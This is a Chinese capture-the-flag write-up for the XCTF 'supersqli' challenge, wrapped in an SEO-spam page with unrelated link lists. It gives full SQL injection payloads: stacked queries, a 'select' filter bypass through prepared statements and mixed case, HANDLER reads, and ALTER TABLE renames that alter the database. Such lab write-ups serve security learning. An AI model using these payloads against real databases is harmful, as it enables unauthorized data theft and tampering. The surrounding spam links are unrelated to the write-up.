当前位置: 首页 > news >正文

互联网网站基础北京seo优化多少钱

互联网网站基础,北京seo优化多少钱,合肥设计公司排名,房地产趋势与前景XCTF_Web_高手进阶区 supersqli supersqli 这里使用谷歌浏览器 拿到题目后,发现是单引号报错字符型注入 用order by语句判断出两个字段:order by 2的时候页面正常回显,order by 3的时候页面出错。 使用union select联合查询,发现…

XCTF_Web_高手进阶区

  • supersqli

supersqli

这里使用谷歌浏览器
拿到题目后,发现是单引号报错字符型注入
在这里插入图片描述
用order by语句判断出两个字段:order by 2的时候页面正常回显,order by 3的时候页面出错。
使用union select联合查询,发现关键字select被正则过滤了
在这里插入图片描述
因此,需要绕过select的过滤
解法一:
(1)堆叠注入/?inject=-1’;show tables --+
在这里插入图片描述
(2)发现了两张表,分别查询两张表中的字段,
/?inject=-1’;show columns from 1919810931114514 --+
在这里插入图片描述
/?inject=-1’;show columns from words --+
在这里插入图片描述
(3)发现了flag在第一个表中,接下来就是要查看flag的内容了。但是select被过滤了,这里可以采用预编译的方式绕过。

?inject=-1';set @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepare aaa from @sql;EXECUTE aaa;#

在这里插入图片描述
(4)这里用strstr函数过滤了’set’和’prepare’关键词,利用strstr不能区分大小写,将其改为大写即可

/?inject=-1';sEt @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepArE aaa from @sql;EXECUTE aaa;#

或者

/?inject=-1';sEt @sql = CONCAT('se','lect * from \`1919810931114514\`;');prEpare stmt from @sql;EXECUTE stmt;#

或者

/?inject=-1';use supersqli;set @sql=concat('s','elect * from \`1919810931114514\`');PREPARE pre FROM @sql;EXECUTE pre;--+

在这里插入图片描述
解法二:
handler查询
在查找到有两张表的前提下进行
(1)使用方法:
handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行

/?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

在这里插入图片描述
解法三:
(1)修改表名和列名,在查找到两个表后,看一下第二个表
在这里插入图片描述
(2)其中有一个列就是data列,是可以进行查询的。所以这里将表1919810931114514名字改为words,flag列名字改为id,就可以查询flag的内容了。

1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

其中:
alter table words rename to aaaa;先把原来的words表名字改成别的,这个随便
alter table`1919810931114514` rename to words;将表1919810931114514的名字改为words
alter table words change flag id varchar(100);将改完名字后的表中的flag改为id,字符串尽量长点
(3)然后用1’ or 1=1 --+直接就能得到正确结果
在这里插入图片描述

http://www.ds6.com.cn/news/36497.html

相关文章:

  • flash网站需要改变厦门人才网招聘官网
  • 漯河住房建设局网站百度网页怎么制作
  • 中国林业建设工程网站中国十大搜索引擎网站
  • 营销型网站建设费用做网络推广有哪些平台
  • 深圳网站优化怎么做营销网站seo推广
  • wordpress输入网址采集单个网页深圳快速seo排名优化
  • 做汽配的外贸网站雷神代刷网站推广
  • 英文外贸网站建设网站设计方案百度百科查询
  • 怎么才能建立一个网站百度旧版本
  • 技术支持::天空网络-临汾做网站天津百度推广公司地址
  • discuz做地方门户网站亚马逊关键词排名查询工具
  • 花茶网站设计新闻 今天
  • 南宁智慧园区网站建设seo网站推广价格
  • 平台网站建设外包费用网络营销步骤
  • 重点建设政协网站社交媒体营销策略有哪些
  • 上传网站代码青岛网络推广公司排名
  • id97网站怎么做的深圳seo推广公司
  • 用wordpress做企业网站网站流量宝
  • 怎样做instergram网站营销百度seo优化分析
  • 网站建设销售销售流程图网络营销案例分析论文
  • 公司建设官方网站需要多少钱郑州seo哪家专业
  • 中国建设部网站四库平台百度怎么提交收录
  • 找人做网站毕业设计国际新闻网站
  • springmvc做网站优化推广方案
  • 自己做网站卖视频百度地图导航手机版免费下载
  • 梨树做网站知识营销
  • 网站做专题提升权重百度搜索官方网站
  • 阿玛尼手表网站宁夏百度公司
  • 做网站需求 后期方便优化比较好的搜索引擎
  • 自己做网站要多久社群营销方案